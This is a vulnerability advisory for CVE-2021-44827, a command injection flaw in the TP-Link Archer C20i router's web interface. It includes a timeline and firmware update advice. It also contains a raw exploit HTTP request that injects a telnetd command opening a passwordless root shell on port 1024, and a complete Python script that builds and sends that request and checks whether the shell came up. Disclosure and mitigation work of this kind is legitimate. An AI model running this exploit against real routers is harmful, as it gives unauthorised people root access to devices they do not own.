CVE-2021-44827
Summary
The TP-Link Archer C20i router contains an authenticated remote code execution (OS command injection) vulnerability in its web interface.
Tech details
The TP-Link Archer C20i router with firmware version 0.9.1 3.2 v003a.0 Build 170221 Rel.55462 or older is vulnerable to authenticated remote code execution: an OS command injected into the network interface configuration web request is executed by the router. Admin credentials for the web interface are required to exploit it.
Vulnerability
The vulnerable parameter is X_TP_ExternalIPv6Address in the WAN_IP_CONN object update. Its value is passed to a shell command line without sanitization, so shell metacharacters such as & break out of the intended command. An example of an exploit request may look like this:
POST /cgi?2&2 HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.1/mainFrame.htm
Content-Type: text/plain
Content-Length: 657
Origin: http://192.168.0.1
Connection: close
Cookie: Authorization=Basic YWRtaW46a2o4NzZmc2Q1NjI0ODk=

[WAN_ETH_INTF#1,0,0,0,0,0#0,0,0,0,0,0]0,1
X_TP_lastUsedIntf=ipoe_eth3_s
[WAN_IP_CONN#1,1,1,0,0,0#0,0,0,0,0,0]1,21
externalIPAddress=192.168.9.222
subnetMask=255.255.255.0
defaultGateway=192.168.9.2
NATEnabled=1
X_TP_FullconeNATEnabled=0
X_TP_FirewallEnabled=1
X_TP_IGMPProxyEnabled=1
X_TP_IGMPForceVersion=0
maxMTUSize=1500
DNSOverrideAllowed=1
DNSServers=192.168.9.3,0.0.0.0
X_TP_IPv4Enabled=1
X_TP_IPv6Enabled=0
X_TP_IPv6AddressingType=Static
X_TP_ExternalIPv6Address=&telnetd -p 1024 -l sh&
X_TP_PrefixLength=64
X_TP_DefaultIPv6Gateway=::
X_TP_IPv6DNSOverrideAllowed=0
X_TP_IPv6DNSServers=::,::
X_TP_MLDProxyEnabled=0
enable=1
This authenticated web request starts a telnet server on TCP port 1024. Because telnetd is launched with -l sh, each connection is handed a shell directly instead of a login prompt, so anyone who can reach port 1024 gets a root shell without a password. The Cookie header carries a standard Basic-auth token (base64 of admin:password), which is how this web UI transports the admin credentials.
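The following Python script is an added example, not the Full Disclosure PoC and not TP-Link code. It rebuilds the request shown above from its parts (Basic-auth cookie, object headers, parameter list) so that the Content-Length is computed rather than hard-coded, sends it over a plain socket, and then checks whether port 1024 answers. The host, credentials and interface values are constructed placeholders copied from the sample request; the CRLF line separator inside the config body and the meaning of the trailing number in each object header (the count of key=value lines that follow, 1 and 21 in the sample) are assumptions drawn from the sample request.

```python
"""CVE-2021-44827: build the injected WAN_IP_CONN update and optionally send it.

Added example, not the Full Disclosure PoC. Host, credentials and interface
values are constructed placeholders taken from the advisory's sample request;
the CRLF line separator inside the config body is an assumption.
"""
import base64
import socket
import sys

# Parameters of the WAN_IP_CONN object in the order the advisory's request
# lists them. X_TP_ExternalIPv6Address is the injectable field; build_body()
# fills it in.
WAN_IP_CONN = [
    ("externalIPAddress", "192.168.9.222"),
    ("subnetMask", "255.255.255.0"),
    ("defaultGateway", "192.168.9.2"),
    ("NATEnabled", "1"),
    ("X_TP_FullconeNATEnabled", "0"),
    ("X_TP_FirewallEnabled", "1"),
    ("X_TP_IGMPProxyEnabled", "1"),
    ("X_TP_IGMPForceVersion", "0"),
    ("maxMTUSize", "1500"),
    ("DNSOverrideAllowed", "1"),
    ("DNSServers", "192.168.9.3,0.0.0.0"),
    ("X_TP_IPv4Enabled", "1"),
    ("X_TP_IPv6Enabled", "0"),
    ("X_TP_IPv6AddressingType", "Static"),
    ("X_TP_ExternalIPv6Address", ""),  # placeholder, replaced by build_body()
    ("X_TP_PrefixLength", "64"),
    ("X_TP_DefaultIPv6Gateway", "::"),
    ("X_TP_IPv6DNSOverrideAllowed", "0"),
    ("X_TP_IPv6DNSServers", "::,::"),
    ("X_TP_MLDProxyEnabled", "0"),
    ("enable", "1"),
]


def build_body(command: str) -> str:
    """Config body with `command` injected into X_TP_ExternalIPv6Address.

    The advisory wraps the command in '&...&': the field is pasted into a
    shell command line, so the first '&' terminates whatever precedes it and
    the second backgrounds the injected command. The number after the comma
    in each object header is taken to be the count of key=value lines that
    follow (1 and 21 in the advisory's request); CRLF separators are assumed.
    """
    lines = [
        "[WAN_ETH_INTF#1,0,0,0,0,0#0,0,0,0,0,0]0,1",
        "X_TP_lastUsedIntf=ipoe_eth3_s",
        f"[WAN_IP_CONN#1,1,1,0,0,0#0,0,0,0,0,0]1,{len(WAN_IP_CONN)}",
    ]
    for key, value in WAN_IP_CONN:
        if key == "X_TP_ExternalIPv6Address":
            value = f"&{command}&"
        lines.append(f"{key}={value}")
    return "\r\n".join(lines) + "\r\n"


def build_request(host: str, username: str, password: str, command: str) -> bytes:
    """Raw HTTP/1.1 request; Content-Length is computed from the body."""
    body = build_body(command).encode()
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    headers = [
        "POST /cgi?2&2 HTTP/1.1",
        f"Host: {host}",
        f"Referer: http://{host}/mainFrame.htm",
        "Content-Type: text/plain",
        f"Content-Length: {len(body)}",
        # The web UI sends the Basic-auth token in a cookie, not in an
        # Authorization header, exactly as the advisory's request shows.
        f"Cookie: Authorization=Basic {token}",
        "Connection: close",
    ]
    return ("\r\n".join(headers) + "\r\n\r\n").encode() + body


def send_raw(host: str, request: bytes, port: int = 80, timeout: float = 5.0) -> bytes:
    """Deliver the request over a plain socket and return the router's reply."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


def port_open(host: str, port: int = 1024, timeout: float = 3.0) -> bool:
    """Check whether the injected telnetd came up (the advisory's success test)."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


if __name__ == "__main__":
    # usage: python3 cve_2021_44827.py 192.168.0.1 admin <password>
    target, user, pw = sys.argv[1:4]
    send_raw(target, build_request(target, user, pw, "telnetd -p 1024 -l sh"))
    print("telnet on 1024:", "open" if port_open(target) else "closed")
```

Only build_body() and build_request() run offline; send_raw() and port_open() need a reachable device. Computing Content-Length from the assembled body avoids the classic mistake of editing the injected command and leaving a stale length, which makes the CGI read a truncated or over-long body.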
Proof-of-concept
A proof-of-concept Python script is available in this repository:
https://github.com/full-disclosure/CVE-2021-44827
Update is available
To mitigate the issue, update to the latest available firmware from TP-Link:
https://www.tp-link.com/en/support/download/archer-c20i/#Firmware
Because the attack requires valid admin credentials, a non-default admin password and an admin interface that is not reachable from the WAN reduce exposure on devices that have not yet been updated.
The Full Disclosure team recommends using routers that support OpenWRT.
Timeline
2021-12-08 - initial research
2021-12-09 - CVE-2021-44827 assigned
2021-12-13 - exploit PoC sent to TP-Link
2021-12-21 - TP-Link confirmed the issue
2022-01-18 - TP-Link released a fixed firmware and asked for verification
2022-02-17 - TP-Link published the fixed firmware
2022-03-02 - full disclosure